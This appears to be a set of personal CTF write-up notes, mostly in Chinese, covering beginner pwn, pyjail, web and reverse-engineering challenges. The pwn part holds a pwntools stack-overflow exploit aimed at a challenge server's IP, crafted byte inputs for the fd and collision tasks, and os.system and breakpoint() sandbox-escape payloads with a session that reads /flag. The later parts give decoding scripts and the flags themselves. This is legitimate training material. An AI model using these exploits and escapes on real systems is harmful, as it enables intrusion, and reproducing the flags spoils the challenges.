pwn

basic-overflow

有一个shell函数，栈溢出覆盖返回地址为shell

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[64]; // [rsp+0h] [rbp-40h] BYREF

  gets(v4, argv, envp);
  return 0;
}

int shell()
{
  return execve("/bin/sh", 0LL, 0LL);
}

exp

from pwn import *
from LibcSearcher import *

context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./basic-overflow')
libc = elf.libc

is_debug = 0

if(is_debug):
    p = process()
else:
    ip = "34.123.15.202"
    port = 5000
    p = remote(ip,port)

# gdb.attach(p)
g = lambda x: gdb.attach(x)

# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)

# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)

r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])


payload = b'a' * (0x40 + 0x8) + p64(0x401136)

sl(payload)

p.interactive()

baby-shellcode

fd

程序逻辑是这样的， 从fd里读数据，如果数据为LETMEWIN就会输出flag。那可以让fd = 0 (标准输入)，让read去read我的输入，然后再输入LETMEWIN

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
        if(argc<2){
                printf("pass argv[1] a number\n");
                return 0;
        }
        int fd = atoi( argv[1] ) - 0x1234;
        int len = 0;
        len = read(fd, buf, 32);
        if(!strcmp("LETMEWIN\n", buf)){
                printf("good job :)\n");
                system("/bin/cat flag");
                exit(0);
        }
        printf("learn about Linux file IO\n");
        return 0;
}

./fd 4660
LETMEWIN

collision

#include <stdio.h>
#include <string.h>
unsigned long hashcode = 0x21DD09EC;
unsigned long check_password(const char* p){
        int* ip = (int*)p;
        int i;
        int res=0;
        for(i=0; i<5; i++){
                res += ip[i];
        }
        return res;
}

int main(int argc, char* argv[]){
        if(argc<2){
                printf("usage : %s [passcode]\n", argv[0]);
                return 0;
        }
        if(strlen(argv[1]) != 20){
                printf("passcode length should be 20 bytes\n");
                return 0;
        }

        if(hashcode == check_password( argv[1] )){
                system("/bin/cat flag");
                return 0;
        }
        else
                printf("wrong passcode.\n");
        return 0;
}

代码逻辑是 读总共20个字节的数据，分五次读，一次读4个字节，累加后如果为0x21DD09EC 就会输出flag，得按字节码输入，如果直接输入数字的话，一个数字会占一个字节(ascii)，那怎么加都加不到0x21dd09ec的，可以用python和 linux下的 ``来解决键入字节码的问题

exp:

./col `python -c 'print "\xc9\xce\xc5\x06\xc9\xce\xc5\x06\xc9\xce\xc5\x06\xc9\xce\xc5\x06\xc8\xce\xc5\x06"'`

bof

pyjali

level 1

__import__('os').system('cat /flag')

level2

f"{__import__('os').system('cat /flag')}"

level3

有一个字符长度限制，测试一下长度13，试了一下breakpoint可以使用，可以用breakpoint打开一个调试器去绕过这个长度限制

lhj@lhj-virtual-machine:~/Desktop/cbctf/pwn$ nc training.0rays.club 10100

 _     _______     _______ _       _____
| |   | ____\ \   / / ____| |     |___ /
| |   |  _|  \ \ / /|  _| | |       |_ \
| |___| |___  \ V / | |___| |___   ___) |
|_____|_____|  \_/  |_____|_____| |____/


Welcome to the JBNRZ's pyjail
Enter your expression and I will evaluate it for you.
Example:
  input: 1 + 1
  Result: 2
> breakpoint()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')
*** SyntaxError: invalid syntax
(Pdb) print(1)
1
(Pdb) __import__('os').system('cat /flag')
CBCTF{9fc71bcf-1809-413d-98e1-41155ffd6211}

level4

和3 一样可以通过breakpoint

Hackergame 启动

Hackergame启动！发现校验相似度是在前端校验的，然后通过url传参相似度，传递个100过去就拿到flag了

更深更暗

在main.js里有一段生成flag的代码，在控制台中调用就好了

async function getFlag(token) {
    // Generate the flag based on user's token
    let hash = CryptoJS.SHA256(`dEEper_@nd_d@rKer_${token}`).toString();
    return `flag{T1t@n_${hash.slice(0, 32)}}`;
}

async function getFlag(token) {
        // Generate the flag based on user's token
        let hash = CryptoJS.SHA256(`dEEper_@nd_d@rKer_${token}`).toString();
        return `flag{T1t@n_${hash.slice(0, 32)}}`;
    }
getFlag(localStorage.token)

猫咪小测

1. 想要借阅世界图书出版公司出版的《A Classical Introduction To Modern Number Theory 2nd ed.》，应当前往中国科学技术大学西区图书馆的哪一层？（30 分）
12
暴力破解

2. 今年 arXiv 网站的天体物理版块上有人发表了一篇关于「可观测宇宙中的鸡的密度上限」的论文，请问论文中作者计算出的鸡密度函数的上限为 10 的多少次方每立方秒差距？（30 分）
23

https://arxiv.org/abs/2303.17626


3. 为了支持 TCP BBR 拥塞控制算法，在编译 Linux 内核时应该配置好哪一条内核选项？
CONFIG_TCP_CONG_BBR

https://github.com/google/bbr/blob/master/Documentation/bbr-quick-start.md


4. 🥒🥒🥒：「我……从没觉得写类型标注有意思过」。在一篇论文中，作者给出了能够让 Python 的类型检查器 MyPY mypy 陷入死循环的代码，并证明 Python 的类型检查和停机问题一样困难。请问这篇论文发表在今年的哪个学术会议上？（20 分）
提示：会议的大写英文简称，比如 ISCA、CCS、ICML。

ECOOP
https://drops.dagstuhl.de/opus/volltexte/2023/18237/pdf/LIPIcs-ECOOP-2023-44.pdf


好耶学会怎么搜索论文了,Google hacker语法，萃取关键词，然后按时间筛选缩小范围

re

点击就送的逆向题

.S的文件 使用as命令来汇编一下，然后ida打开分析逻辑

as -o output.o input.S

置反一下逻辑

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+Ch] [rbp-54h]
  char s1[32]; // [rsp+10h] [rbp-50h] BYREF
  char s2[40]; // [rsp+30h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+58h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  strcpy(s2, "Z`J[X^LMNO`PPJPVQRSIUTJ]IMNOZKMM");
  _isoc99_scanf(&unk_F4, s1);
  for ( i = 0; i <= 31; ++i )
    s1[i] += 7;
  if ( !strcmp(s1, s2) )
    printf("wrong!");
  puts("good!");
  return 0;
}

flag = "Z`J[X^LMNO`PPJPVQRSIUTJ]IMNOZKMM"

for i in range(len(flag)):
    byte = ord(flag[i]) - 7
    print(chr(byte),end="")

SYC{SYCTQWEFGHYIICIOJKLBNMCVBFGHSDFF}

shiftjmp

有个jmp的花指令 nop掉后，对着main u p 重新打包main函数反编译

RE

Reverse入门指北

if ( *(_DWORD *)v7 == 13 )
   sub_401082(aMoectfF1rstSt3, v6);

aMoectfF1rstSt3 db 'moectf{F1rst_St3p_1s_D0ne}',0Ah,0

base_64

pycdc 下载 编译

发现是base64变种

http://web.chacuo.net/netbasex

把索引表复制进去解密拿到flag

UPX!

RE

easy_RE

确实是打开就有

flag{we1c0me_to_rev3rse!!}

elf

inputString 先异或然后+16 然后base64encode后和flag cmp，decode后-16 异或就好了

s1 = (char *)base64_encode(v6, v3);
  if ( !strcmp(s1, "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t") )
  
 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

_BYTE *__fastcall encode(const char *a1)
{
  size_t v1; // rax
  int v2; // eax
  _BYTE *v4; // [rsp+20h] [rbp-20h]
  int i; // [rsp+28h] [rbp-18h]
  int v6; // [rsp+2Ch] [rbp-14h]

  v1 = strlen(a1);
  v4 = malloc(2 * v1 + 1);
  v6 = 0;
  for ( i = 0; i < strlen(a1); ++i )
  {
    v2 = v6++;
    v4[v2] = (a1[i] ^ 0x20) + 16;
  }
  v4[v6] = 0;
  return v4;
}

import base64

def custom_base64_decode(encoded_str):
    custom_base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    standard_base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    translation = str.maketrans(custom_base64_chars, standard_base64_chars)
    return base64.b64decode(encoded_str.translate(translation))

def xor(encoded_bytes):
    decoded_chars = []
    for byte in encoded_bytes:
        char = chr((byte - 16) ^ 0x20)
        decoded_chars.append(char)
    return ''.join(decoded_chars)


encoded_str = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"
print(xor(custom_base64_decode(encoded_str)))

flag{D0_4ou_7now_wha7_ELF_1s?}

RE

crackme

运行就拿到flag了？看了一下是upx3.96

babyRe

反编译了一下，大概是这样一个逻辑，rsa

import libnum
from crypto.Util.number import *
flag = 'ISCTF{******************}'
flags = flag.encode()
e = 65537
p = libnum.generate_prime(1024)
q = libnum.generate_prime(1024)
n = p * q
m = bytes_to_long(flags)
c = pow(m, e, n)
output = open('output.txt', 'w')
output.write('p+q =' + str(p + q) + '\n')
output.write('(p+1)*(q+1)=' + str((p + 1) * (q + 1)) + '\n')
output.write('c=' + str(c) + '\n')
output.close()

from sympy import symbols, solve, isprime
from Crypto.Util.number import inverse, long_to_bytes


p_plus_q = 292884018782106151080211087047278002613718113661882871562870811030932129300110050822187903340426820507419488984883216665816506575312384940488196435920320779296487709207011656728480651848786849994095965852212548311864730225380390740637527033103610408592664948012814290769567441038868614508362013860087396409860

p_plus_1_q_plus_1 = 21292789073160227295768319780997976991300923684414991432030077313041762314144710093780468352616448047534339208324518089727210764843655182515955359309813600286949887218916518346391288151954579692912105787780604137276300957046899460796651855983154616583709095921532639371311099659697834887064510351319531902433355833604752638757132129136704458119767279776712516825379722837005380965686817229771252693736534397063201880826010273930761767650438638395019411119979149337260776965247144705915951674697425506236801595477159432369862377378306461809669885764689526096087635635247658396780671976617716801660025870405374520076160
ciphertext = 5203005542361323780340103662023144468501161788183930759975924790394097999367062944602228590598053194005601497154183700604614648980958953643596732510635460233363517206803267054976506058495592964781868943617992245808463957957161100800155936109928340808755112091651619258385206684038063600864669934451439637410568700470057362554045334836098013308228518175901113235436257998397401389511926288739759268080251377782356779624616546966237213737535252748926042086203600860251557074440685879354169866206490962331203234019516485700964227924668452181975961352914304357731769081382406940750260817547299552705287482926593175925396
e = 65537

n = p_plus_1_q_plus_1 - p_plus_q - 1

p, q = symbols('p q')
solutions = solve([p + q - p_plus_q, p*q - n], (p, q))
p, q = [int(sol) for sol in solutions[0] if isprime(sol)]

phi = (p - 1) * (q - 1)
d = inverse(e, phi)

m = pow(ciphertext, d, n)
flag = long_to_bytes(m).decode()
print(flag)

mfx_re

mfx? 搜索了一下，是修改了 upx的特征，把upx! 的字段修改成了mfx!，010edit中把文件里面几个mfx! 修改成upx! 就能用upx -d解压了，readelf -a也能看到符号表

关键逻辑是这里，++一下就好了

RE

PZthon

发现是python写的，先用 pyinstxtractor解包，然后将PZthon.pyc用pycdc反编译得到源码

# Source Generated with Decompyle++
# File: PZthon.pyc (Python 3.9)


def hello():
    art = '\n              ___                                                                      \n    //   ) )     / /    //   ) )  // | |     / /        // | |  \\ / / \\    / /       \n   //___/ /     / /    //        //__| |    / /        //__| |   \\  /   \\  / /        \n  / ____ /     / /    //  ____  / ___  |   / /        / ___  |   / /     \\/ /         \n //           / /    //    / / //    | |  / /        //    | |  / /\\     / /          \n//           / /___ ((____/ / //     | | / /____/ / //     | | / /  \\   / /           \n                                                                                       \n     / /        //   / / ||   / / //   / /  / /       /__  ___/ ||   / |  / / //   ) ) \n    / /        //____    ||  / / //____    / /          / /     ||  /  | / / //   / /  \n   / /        / ____     || / / / ____    / /          / /      || / /||/ / //   / /   \n  / /        //          ||/ / //        / /          / /       ||/ / |  / //   / /    \n / /____/ / //____/ /    |  / //____/ / / /____/ /   / /        |  /  | / ((___/ /     \n'
    print(art)
    return bytearray(input('Please give me the flag: ').encode())

enc = [
    115,
    121,
    116,
    114,
    110,
    76,
    37,
    96,
    88,
    116,
    113,
    112,
    36,
    97,
    65,
    125,
    103,
    37,
    96,
    114,
    125,
    65,
    39,
    112,
    70,
    112,
    118,
    37,
    123,
    113,
    69,
    79,
    82,
    84,
    89,
    84,
    77,
    76,
    36,
    112,
    99,
    112,
    36,
    65,
    39,
    116,
    97,
    36,
    102,
    86,
    37,
    37,
    36,
    104]
data = hello()
for i in range(len(data)):
    data[i] = data[i] ^ 21
if bytearray(enc) == data:
    print('WOW!!')
else:
    print('I believe you can do it!')
input('To be continue...')

异或一下拿到flag

enc = [
    115,
    121,
    116,
    114,
    110,
    76,
    37,
    96,
    88,
    116,
    113,
    112,
    36,
    97,
    65,
    125,
    103,
    37,
    96,
    114,
    125,
    65,
    39,
    112,
    70,
    112,
    118,
    37,
    123,
    113,
    69,
    79,
    82,
    84,
    89,
    84,
    77,
    76,
    36,
    112,
    99,
    112,
    36,
    65,
    39,
    116,
    97,
    36,
    102,
    86,
    37,
    37,
    36,
    104]

for i in enc:
    print(chr(i ^ 21),end="")

SMC

smc 顾名思义Self-Modifying Code，将代码加密，在运行的时候运行解密的函数，解密加密的代码

这里首先用了一个 VP函数改变了text段的权限，然后通过sub_401042() 里的逻辑，对加密的代码解密，只需要用idapy写一个解密的逻辑，然后转unk类型 转function类型，就能看到加密前的逻辑了

int __cdecl main(int argc, const char **argv, const char **envp)
{
  DWORD *v3; // eax

  v3 = (DWORD *)malloc(0x26u);
  VirtualProtect(&byte_403040, 0x26u, 0x40u, v3);
  puts("Please enter your flag:");
  sub_401025("%s", (char)&unk_4033D4);
  if ( NtCurrentPeb()->BeingDebugged )
  {
    MessageBoxA(0, "Debug Detected!", "Warning!", 0);
    Sleep(0x1388u);
    exit(0);
  }
  sub_401042();
  if ( ((int (__cdecl *)(void *, void *))byte_403040)(&unk_4033D4, &unk_403020) )
    puts("Win!");
  else
    puts("Lose!");
  return system("pause");
}

week1

Re

数字筑基

​

else
  {
    sub_401020((char *)&byte_402210, Arglist[0]);
    v4 = "0xGame{5f4812eb-6dee-46ab-9910-92af643cd911}\n";
  }
  sub_401020(v4, Arglist[0]);
  system("pause");
  return 0;
}

0xGame{5f4812eb-6dee-46ab-9910-92af643cd911}

代码金丹

v3 = strcmp(Arglist, "0xGame{620bbfcb-e56f-4e6d-8069-9587e066130a}");
if ( v3 )
  v3 = v3 < 0 ? -1 : 1;
v4 = (char *)&unk_4021B0;
if ( !v3 )
  v4 = (char *)&byte_40217C;
sub_401020(v4, Arglist[0]);

0xGame{620bbfcb-e56f-4e6d-8069-9587e066130a}

网络元婴